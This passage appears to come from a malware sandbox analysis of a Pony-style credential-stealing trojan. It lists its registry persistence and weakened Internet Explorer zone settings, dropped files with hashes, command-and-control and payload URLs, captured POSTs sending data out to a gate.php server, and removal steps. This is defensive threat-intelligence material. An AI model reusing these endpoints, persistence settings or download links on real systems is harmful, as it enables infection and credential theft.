"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"wilk.exe" = "WindowsApplication1"
"msv.exe" = "msv"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"p.exe" = "p"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process ie.exe:1472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 97 EA A0 F7 6D 35 E5 6F 6F 65 46 33 7A 97 6A"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%WinDir%\TEMP\IE9B6.tmp\SQMAPI.DLL,"
Dropped PE files
MD5 | File path |
---|---|
2b00be8eea30b151d5a1b84e0ce0b134 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\msv.exe |
ac2dc3101f04217a7298be46988676c9 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\p.exe |
82c072819372b55ecb2009879f35c118 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\wilk.exe |
90d33721af9ecdbd9fb978ebce5107e4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\ie.exe |
0e552f559edb48ac376a1e54b20996fd | c:\Program Files\Internet Explorer\mswinsck.ocx |
8d714a229560c585556b27aacc23016b | c:\WINDOWS\Temp\IE9B6.tmp\SQMAPI.DLL |
c1e98405fb770e496c32ca1e18ffe93c | c:\WINDOWS\gbclass.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
RegSvr32.exe:744
p.exe:2008
mscorsvw.exe:172
regsvr32.exe:1024
ie.exe:1472 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\gbclass.dll (7386 bytes)
%Program Files%\Internet Explorer\mswinsck.ocx (1312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ie.exe (353954 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\a.dll (16222 bytes)
%Documents and Settings%\%current user%\Application Data\Bactria.xs (2104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB5.tmp\Bactria.dll (2476 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\cJZKeOuBrn4kERxqtaUH3fY6323mHUZFJMgTvxaG2iE[1].eot (8346 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\ServiceLogin[1].htm (4462 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\logo_2x[1].png (3393 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\DXI1ORHCpsQm3Vp6mXoaTXZ2MAKAc2x4R1uOSeegc5U[1].eot (8343 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\avatar_2x[1].png (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\logo_strip_2x[1].png (4739 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@accounts.google[2].txt (712 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (2728 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\universal_language_settings-21[1].png (199 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@accounts.google[1].txt (950 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\ServiceLogin[1].htm (5907 bytes)
%Documents and Settings%\%current user%\Application Data\p.exe (2452 bytes)
%Documents and Settings%\%current user%\Application Data\wilk.exe (182 bytes)
%Documents and Settings%\%current user%\Application Data\nf.xpi (863 bytes)
%Documents and Settings%\%current user%\Application Data\msv.exe (29851 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\ienrcore.exe (3574 bytes)
%WinDir%\Temp\IE9B6.tmp\SQMAPI.DLL (141 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.mum (472 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.cat (14 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.cat (14 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.cat (20 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.cat (1270 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.cat (830 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.cat (1404 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-neutral.Extracted.cab (132160 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.cat (9 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\NrPolicy.txt (1316 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\trustedinstaller.exe.manifest (803 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\ieinfra.manifest (374 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.cat (11 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.cat (20 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.cat (11 bytes)
%WinDir%\IE9_main.log (3233 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support.cab (121 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.mum (1 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"internet" = "explorer C:\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"msv.exe" = "%Documents and Settings%\%current user%\Application Data\msv.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: fewfwefewfwe
Product Name: j45j54j445j4j45
Product Version: 1.0.0.11
Legal Copyright: wefwefwe
Legal Trademarks: 22h4j4
Original Filename: jh45j4j5
Internal Name: fewfwfwefwef
File Version: 8.9.4.1
File Description: fwefwefewfwefwef
Comments:
Language: Language Neutral
Company Name: fewfwefewfweProduct Name: j45j54j445j4j45Product Version: 1.0.0.11Legal Copyright: wefwefweLegal Trademarks: 22h4j4Original Filename: jh45j4j5Internal Name: fewfwfwefwefFile Version: 8.9.4.1File Description: fwefwefewfwefwefComments: Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
CODE | 4096 | 240984 | 241152 | 4.48485 | 80c75e8093f230761f1e69dd2b7e30b9 |
DATA | 245760 | 5400 | 5632 | 3.15243 | 44bca2130f0a4e25d41c9968603fbb54 |
BSS | 253952 | 3149 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 258048 | 4322 | 4608 | 3.24333 | c6c5aba65d4c07941894e6c14e74fa0b |
.reloc | 266240 | 21236 | 21504 | 4.58401 | 4cd4e2eda34f697f185f673ac43abcb4 |
.rsrc | 290816 | 15872 | 15872 | 2.59079 | 9268e3b3f22a4543ec6aed9b4ec6bb83 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://84.201.32.74/pony/gate.php | |
hxxp://ge.tt/api/1/files/71MPY782/0/blob?download | 54.195.252.180 |
hxxp://open.ge.tt/1/files/71MPY782/0/blob?download | |
hxxp://s3-3-w.amazonaws.com/gett/71MPY782/modulo?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=aaqxkxBvNuGMZHOPceIH+TTA3Ug=&Expires=1421431475 | |
hxxp://ge.tt/api/1/files/7Pbxr582/0/blob?download | 54.195.252.180 |
hxxp://open.ge.tt/1/files/7Pbxr582/0/blob?download | |
hxxp://s3-3-w.amazonaws.com/gett/7Pbxr582/MSWINSCK.OCX?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=chisXchTVSIgeHHvcCSonuUKCy0=&Expires=1421431482 | |
hxxp://a767.dscms.akamai.net/download/7/B/D/7BD95543-D8A7-474F-8A79-34DE266AAC27/IE9-Windows7-x86-ptb.exe | |
hxxp://s3.kkloud.com.s3.amazonaws.com/gett/71MPY782/modulo?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=aaqxkxBvNuGMZHOPceIH+TTA3Ug=&Expires=1421431475 | 54.231.136.26 |
hxxp://w865553.open.ge.tt/1/files/71MPY782/0/blob?download | 54.247.122.87 |
hxxp://w007363.open.ge.tt/1/files/7Pbxr582/0/blob?download | 54.247.122.87 |
hxxp://download.microsoft.com/download/7/B/D/7BD95543-D8A7-474F-8A79-34DE266AAC27/IE9-Windows7-x86-ptb.exe | 72.246.43.8 |
hxxp://bigbone10.info/pony/gate.php | |
hxxp://s3.kkloud.com.s3.amazonaws.com/gett/7Pbxr582/MSWINSCK.OCX?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=chisXchTVSIgeHHvcCSonuUKCy0=&Expires=1421431482 | 54.231.136.26 |
mail.google.com | 74.125.226.85 |
ssl.gstatic.com | 74.125.226.79 |
paco2015.ddns.net | 65.181.118.218 |
accounts.google.com | 173.194.76.84 |
fonts.gstatic.com | 173.194.68.94 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /pony/gate.php HTTP/1.0
Host: bigbone10.info
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 432
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
...WP........0.;...q...2d...ZN....7M.s..rK...j..I.@E.H..*B.r0.q.N.......,............i...|...#^.nG..5....YK..1......C...6.31.[...h*.7^...........Fz8e.Hc..8v..
....3..Tq@..ar.9..@......K.%VJ....e:...`.F~....9.T.X.6.a.1...N...6.a.A......v[.I..M...>x.i....C.{,.z5.2.2...6.)..l...nc..!.tV....\.J......^S..G.V.9.q*.Y..F..C..'-[n4..y.}.b..;V/...].....]^>_....c.^...L.i>..........J.......Cg...-..>}......./6.W.j.2......g.....5..4.D..
HTTP/1.1 404 Not Found
Date: Fri, 16 Jan 2015 17:59:56 GMT
Server: Apache
Content-Length: 275
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /pony/gate.php was not found on this server.</p>.<hr>.<address>Apache Server at bigbone10.info Port 80</address>.</body></html>...
POST /pony/gate.php HTTP/1.0
Host: bigbone10.info
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 432
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
...WP........0.;...q...2d...ZN....7M.s..rK...j..I.@E.H..*B.r0.q.N.......,............i...|...#^.nG..5....YK..1......C...6.31.[...h*.7^...........Fz8e.Hc..8v..
....3..Tq@..ar.9..@......K.%VJ....e:...`.F~....9.T.X.6.a.1...N...6.a.A......v[.I..M...>x.i....C.{,.z5.2.2...6.)..l...nc..!.tV....\.J......^S..G.V.9.q*.Y..F..C..'-[n4..y.}.b..;V/...].....]^>_....c.^...L.i>..........J.......Cg...-..>}......./6.W.j.2......g.....5..4.D..
HTTP/1.1 404 Not Found
Date: Fri, 16 Jan 2015 17:59:45 GMT
Server: Apache
Content-Length: 275
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /pony/gate.php was not found on this server.</p>.<hr>.<address>Apache Server at bigbone10.info Port 80</address>.</body></html>...
POST /pony/gate.php HTTP/1.0
Host: bigbone10.info
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 432
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
...WP........0.;...q...2d...ZN....7M.s..rK...j..I.@E.H..*B.r0.q.N.......,............i...|...#^.nG..5....YK..1......C...6.31.[...h*.7^...........Fz8e.Hc..8v..
....3..Tq@..ar.9..@......K.%VJ....e:...`.F~....9.T.X.6.a.1...N...6.a.A......v[.I..M...>x.i....C.{,.z5.2.2...6.)..l...nc..!.tV....\.J......^S..G.V.9.q*.Y..F..C..'-[n4..y.}.b..;V/...].....]^>_....c.^...L.i>..........J.......Cg...-..>}......./6.W.j.2......g.....5..4.D..
HTTP/1.1 404 Not Found
Date: Fri, 16 Jan 2015 17:59:50 GMT
Server: Apache
Content-Length: 275
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /pony/gate.php was not found on this server.</p>.<hr>.<address>Apache Server at bigbone10.info Port 80</address>.</body></html>...
GET /api/1/files/71MPY782/0/blob?download HTTP/1.1
Host: ge.tt
Connection: Keep-Alive
HTTP/1.1 307 Temporary Redirect
location: hXXp://w865553.open.ge.tt/1/files/71MPY782/0/blob?download
Connection: keep-alive
Transfer-Encoding: chunked
0......
GET /api/1/files/7Pbxr582/0/blob?download HTTP/1.1
Host: ge.tt
HTTP/1.1 307 Temporary Redirect
location: hXXp://w007363.open.ge.tt/1/files/7Pbxr582/0/blob?download
Connection: keep-alive
Transfer-Encoding: chunked
0..
GET /download/7/B/D/7BD95543-D8A7-474F-8A79-34DE266AAC27/IE9-Windows7-x86-ptb.exe HTTP/1.1
Host: download.microsoft.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 08 Mar 2011 16:50:16 GMT
Accept-Ranges: bytes
ETag: "9c61fee6b0ddcb1:0"
Server: Microsoft-IIS/8.0
Content-Disposition: attachment
Content-Length: 18666800
Date: Fri, 16 Jan 2015 18:00:15 GMT
Connection: keep-alive
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.....a...a...a.x.....a.x...].a.x.....a.x.....a...`.2.a.x.....a.0.....a.x.....a.x.....a.Rich..a.........PE..L...Q(vM............................kv.......................................p............@...... ..........................l...@.......D...............0....P......p...................................@...............H............................text............................... ..`.data...............................@....rsrc...D...........................@..@.reloc..T....P......................@..B............................................................................................................................................................................................................................................................................................................................................................................................................$...2...H...Z...j.......................N...P...H...S.......L...I.......d.......r...d...T........... ...4...F...X...r.......................................<...R...^...n.......................................$.......L...Z...j...|.......................................0...F...V.......z...................................................8...............................t...d...H...................................p...V...J...>...2...............r...h.......0...H...\...6.........................
<<< skipped >>>
GET /1/files/71MPY782/0/blob?download HTTP/1.1
Host: w865553.open.ge.tt
Connection: Keep-Alive
HTTP/1.1 307 Temporary Redirect
location: hXXp://s3.kkloud.com.s3.amazonaws.com/gett/71MPY782/modulo?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=aaqxkxBvNuGMZHOPceIH+TTA3Ug=&Expires=1421431475
connection: keep-alive
transfer-encoding: chunked
0..HTTP/1.1 307 Temporary Redirect..location: hXXp://s3.kkloud.com.s3.amazonaws.com/gett/71MPY782/modulo?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=aaqxkxBvNuGMZHOPceIH+TTA3Ug=&Expires=1421431475..connection: keep-alive..transfer-encoding: chunked..0..
GET /gett/71MPY782/modulo?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=aaqxkxBvNuGMZHOPceIH+TTA3Ug=&Expires=1421431475 HTTP/1.1
Host: s3.kkloud.com.s3.amazonaws.com
Connection: Keep-Alive
HTTP/1.1 200 OK
x-amz-id-2: ER3qduBuOtTHZsiy6kvZfJiqpYM 1pe1huMNfRFLM fDEW30G/2N8pXXGB2KHtLnrWihtk2q84w=
x-amz-request-id: 51861B5045830B3C
Date: Fri, 16 Jan 2015 17:59:54 GMT
Content-Disposition: attachment;
Last-Modified: Wed, 14 Jan 2015 14:49:40 GMT
ETag: "23fdcb8fdaf546b5884e31efad4d5711-1"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 1351680
Server: AmazonS3
OX......................B...............................................#..N.#Vjkq"rpmepco"acllmv"`g"pwl"kl"FMQ"omfg,...&.............s...s...s.(.~...s.).w...s.Pkaj..s.................RG..N....X.V...........#.....2...R...............B.......................................................................5......V7..*....2.......................B..2B..........................................R...".......B...........................,vgzv....*.......2.................."..b,fcvc........B......................B...,pqpa........2.......B..............B..B,pgnma...I...B...R...R..............B..@n.YH............OQT@TO42,FNN....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<< skipped >>>
GET /gett/7Pbxr582/MSWINSCK.OCX?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=chisXchTVSIgeHHvcCSonuUKCy0=&Expires=1421431482 HTTP/1.1
Host: s3.kkloud.com.s3.amazonaws.com
HTTP/1.1 200 OK
x-amz-id-2: xUwL2Dp4fTDppWyne6Xs/XKnAuLZg3pknIIfT0mVztfcQKSV73H4LO9L1r4vI1wbMvadtWBcpfY=
x-amz-request-id: 0F3CB638CF0CD829
Date: Fri, 16 Jan 2015 18:00:00 GMT
Content-Disposition: attachment;
Last-Modified: Wed, 07 Jan 2015 01:08:59 GMT
ETag: "0e03064e0247e969aa256eaf1bf4ddc5-1"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 126800
Server: AmazonS3
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.\J...........#.........................0....."................................. ..............................P ......l........@..Lh..............P............................................................................................text............ .......... .....U. ..`.data...:....0.......0..............@....rsrc...Lh...@...p...@..............@....reloc..p........ ..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<< skipped >>>
GET /1/files/7Pbxr582/0/blob?download HTTP/1.1
Host: w007363.open.ge.tt
Connection: Keep-Alive
HTTP/1.1 307 Temporary Redirect
location: hXXp://s3.kkloud.com.s3.amazonaws.com/gett/7Pbxr582/MSWINSCK.OCX?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=chisXchTVSIgeHHvcCSonuUKCy0=&Expires=1421431482
connection: keep-alive
transfer-encoding: chunked
0..
POST /pony/gate.php HTTP/1.0
Host: bigbone10.info
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 432
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
...WP........0.;...q...2d...ZN....7M.s..rK...j..I.@E.H..*B.r0.q.N.......,............i...|...#^.nG..5....YK..1......C...6.31.[...h*.7^...........Fz8e.Hc..8v..
....3..Tq@..ar.9..@......K.%VJ....e:...`.F~....9.T.X.6.a.1...N...6.a.A......v[.I..M...>x.i....C.{,.z5.2.2...6.)..l...nc..!.tV....\.J......^S..G.V.9.q*.Y..F..C..'-[n4..y.}.b..;V/...].....]^>_....c.^...L.i>..........J.......Cg...-..>}......./6.W.j.2......g.....5..4.D..
HTTP/1.1 404 Not Found
Date: Fri, 16 Jan 2015 17:59:39 GMT
Server: Apache
Content-Length: 275
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /pony/gate.php was not found on this server.</p>.<hr>.<address>Apache Server at bigbone10.info Port 80</address>.</body></html>...
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
msv.exe_1820:
.text
.text
`.itext
`.itext
`.data
`.data
.idata
.idata
.didata
.didata
.rdata
.rdata
@.reloc
@.reloc
B.rsrc
B.rsrc
biClrImportant
biClrImportant
tagMSG
tagMSG
Windows
Windows
HKEY
HKEY
TWMKey
TWMKey
KeyData
KeyData
etNoMonitorSupportException
etNoMonitorSupportException
TArray
TArray
ENoMonitorSupportException
ENoMonitorSupportException
ENoMonitorSupportExceptionL
ENoMonitorSupportExceptionL
TArray
TArray
TArray
TArray
csshiftjis
csshiftjis
windows-936
windows-936
windows-1250
windows-1250
windows-1251
windows-1251
windows-1252
windows-1252
windows-1253
windows-1253
windows-1254
windows-1254
windows-1255
windows-1255
windows-1256
windows-1256
windows-1257
windows-1257
windows-1258
windows-1258
windows-874
windows-874
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
TArray
TArray
grfLocksSupported
grfLocksSupported
Operator
Operator
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
TList.TDirection
TList.TDirection
AOperator
AOperator
TThread.TSynchronizeRecord
TThread.TSynchronizeRecord
TOperation
TOperation
Operation
Operation
FOnExecute
FOnExecute
OnExecuteh(C
OnExecuteh(C
TArray
TArray
TArray
TArray
TList.Sort$876$0$Intfh
TList.Sort$876$0$Intfh
TList.Sort$876$ActRec
TList.Sort$876$ActRec
TList.Sort$876$ActRec4
TList.Sort$876$ActRec4
$TComponent.FindComponent$1499$0$Intfh
$TComponent.FindComponent$1499$0$Intfh
$TComponent.FindComponent$1499$ActRec
$TComponent.FindComponent$1499$ActRec
$TComponent.FindComponent$1499$ActRecx
$TComponent.FindComponent$1499$ActRecx
TRegKeyInfo
TRegKeyInfo
NumSubKeys
NumSubKeys
MaxSubKeyLen
MaxSubKeyLen
FCurrentKey
FCurrentKey
FRootKey
FRootKey
FCloseRootKey
FCloseRootKey
CloseKey
CloseKey
CreateKey
CreateKey
DeleteKey
DeleteKey
GetKeyInfo
GetKeyInfo
GetKeyNames
GetKeyNames
HasSubKeys
HasSubKeys
KeyExists
KeyExists
LoadKey
LoadKey
MoveKey
MoveKey
OpenKey
OpenKey
OpenKeyReadOnly
OpenKeyReadOnly
ReplaceKey
ReplaceKey
RestoreKey
RestoreKey
SaveKey
SaveKey
UnLoadKey
UnLoadKey
CurrentKey\
CurrentKey\
LastErrorMsg
LastErrorMsg
RootKey\
RootKey\
RootKeyName
RootKeyName
EInvalidGraphicOperation
EInvalidGraphicOperation
SupportsPartialTransparency
SupportsPartialTransparency
SupportsClipboardFormat
SupportsClipboardFormat
Monochrome@cE
Monochrome@cE
IsShortCut
IsShortCut
FHelpKeyword
FHelpKeyword
HelpKeyword
HelpKeyword
igoParentPassthrough
igoParentPassthrough
FAlwaysShowDragImages
FAlwaysShowDragImages
AlwaysShowDragImages
AlwaysShowDragImages
toFlickFallbackKeys
toFlickFallbackKeys
'TCustomGestureEngine.TGestureEngineFlag
'TCustomGestureEngine.TGestureEngineFlag
(TCustomGestureEngine.TGestureEngineFlags
(TCustomGestureEngine.TGestureEngineFlags
Supported
Supported
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
FOnKeyDown
FOnKeyDown
FOnKeyPress
FOnKeyPress
FOnKeyUp
FOnKeyUp
IsHintMsg
IsHintMsg
FNativeWheelSupport
FNativeWheelSupport
FWheelSupportMessage
FWheelSupportMessage
thHeaderItemLeftPressed
thHeaderItemLeftPressed
tsArrowBtnLeftPressed
tsArrowBtnLeftPressed
ttbThumbLeftPressed
ttbThumbLeftPressed
lrMonoChrome
lrMonoChrome
FAutoHotkeys
FAutoHotkeys
RethinkHotkeys
RethinkHotkeys
AutoHotkeys
AutoHotkeys
AutoHotkeysD
AutoHotkeysD
UnderstandsKeyword
UnderstandsKeyword
poPortrait
poPortrait
APort
APort
Port
Port
FPasswordChar
FPasswordChar
PasswordChar
PasswordChar
OnKeyDown
OnKeyDown
OnKeyPress
OnKeyPress
OnKeyUp\
OnKeyUp\
ssHorizontal
ssHorizontal
TCustomButton.TButtonStyle
TCustomButton.TButtonStyle
FProportional
FProportional
Proportional
Proportional
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
fsShowing
fsShowing
FWindowState
FWindowState
FKeyPreview
FKeyPreview
WantChildKey
WantChildKey
KeyPreview@
KeyPreview@
WindowState
WindowState
KeyPreview0
KeyPreview0
FBiDiKeyboard
FBiDiKeyboard
FNonBiDiKeyboard
FNonBiDiKeyboard
FEnumAllWindowsOnActivateHint
FEnumAllWindowsOnActivateHint
FOnActionExecute
FOnActionExecute
Keyword
Keyword
EnumAllWindowsOnActivateHint\
EnumAllWindowsOnActivateHint\
BiDiKeyboard\
BiDiKeyboard\
NonBiDiKeyboard
NonBiDiKeyboard
OnActionExecute@VF
OnActionExecute@VF
AMsg
AMsg
EIdCanNotBindPortInRange
EIdCanNotBindPortInRange
EIdCanNotBindPortInRangeh
EIdCanNotBindPortInRangeh
EIdInvalidPortRangeH
EIdInvalidPortRangeH
EIdInvalidPortRange$
EIdInvalidPortRange$
Uh%uL
Uh%uL
CheckIPVersionSupport
CheckIPVersionSupport
WSGetServByPort
WSGetServByPort
APortNumber
APortNumber
VPort
VPort
IdStackWindows
IdStackWindows
TIdSocketListWindows4
TIdSocketListWindows4
TIdSocketListWindows
TIdSocketListWindows
